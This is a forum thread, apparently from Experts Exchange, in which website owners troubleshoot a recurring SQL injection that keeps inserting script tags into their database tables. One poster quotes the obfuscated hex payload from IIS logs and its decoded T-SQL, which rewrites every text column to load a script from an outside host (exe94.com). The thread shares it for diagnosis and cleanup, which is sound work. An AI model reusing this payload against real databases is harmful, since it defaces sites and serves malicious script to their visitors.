vonfranzken
asked on
banner82 sql injection
Can someone tell me how to remove sql injections?
Is banner82 one?
see www.moviecues.com
click on search for sonts and watch
Is banner82 one?
see www.moviecues.com
click on search for sonts and watch
NOt sure what you mean?
can you clarify?
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
I'm experiancing this also, we clear the database of this text 6hours later the text appears again.
Maybe there was some sort of job created on your server that is doing it. Run profiler around when you think it will happen again to see where the statement is coming from.
Ok our developement team have been looking into this, and discovered the cause of it. It looks like a security vulnerability covered in MS KB acticle 951306.
If any one experencing the problem can look through their IIS web access logs for...
DECLARE%20@S%20VARCHAR(400 0);SET%20@ S=CAST(0x4 445434C415 2452040542 0564152434 8415228323 535292C404 3205641524 3484152283 2353529204 445434C415 2452054616 26C655F437 572736F722 0435552534 F5220464F5 22053454C4 5435420612 E6E616D652 C622E6E616 D652046524 F4D2073797 36F626A656 3747320612 C737973636 F6C756D6E7 3206220574 8455245206 12E69643D6 22E6964204 14E4420612 E787479706 53D2775272 0414E44202 8622E78747 970653D393 9204F52206 22E7874797 0653D33352 04F5220622 E787479706 53D3233312 04F5220622 E787479706 53D3136372 9204F50454 E205461626 C655F43757 2736F72204 6455443482 04E4558542 046524F4D2 05461626C6 55F4375727 36F7220494 E544F20405 42C4043205 748494C452 8404046455 443485F535 4415455533 D302920424 547494E204 5584543282 7555044415 445205B272 B40542B275 D205345542 05B272B404 32B275D3D5 25452494D2 8434F4E564 5525428564 1524348415 2283430303 0292C5B272 B40432B275 D29292B272 73C7363726 9707420737 2633D68747 4703A2F2F7 777772E657 86539342E6 36F6D2F622 E6A733E3C2 F736372697 0743E27272 7292046455 44348204E4 5585420465 24F4D20546 1626C655F4 37572736F7 220494E544 F2040542C4 04320454E4 420434C4F5 3452054616 26C655F437 572736F722 04445414C4 C4F4341544 5205461626 C655F43757 2736F7220% 20AS%20VAR CHAR(4000) );EXEC(@S) ;
Some one has been running that along side one of our ASP pages
Translating the Hex string to Ascii results in the following...
DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VAR CHAR(4000) ,['+@C+']) )+''<scrip t src=http://www.exe94.com/b.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
Resulting in text actually being imported to the tables...
If any one experencing the problem can look through their IIS web access logs for...
DECLARE%20@S%20VARCHAR(400
Some one has been running that along side one of our ASP pages
Translating the Hex string to Ascii results in the following...
DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VAR
Resulting in text actually being imported to the tables...
WEll that is sweet...was it SQL Injected?
Yes it was. quite a few tables were affected
They had run the command after one of our search pages.
We're removing the injected strings (again) and will follow the guide lines of the KB acticle, hopefully we've solved this one.
They had run the command after one of our search pages.
We're removing the injected strings (again) and will follow the guide lines of the KB acticle, hopefully we've solved this one.
YOu can probably get around it by just using a stored proc instead of the inline code.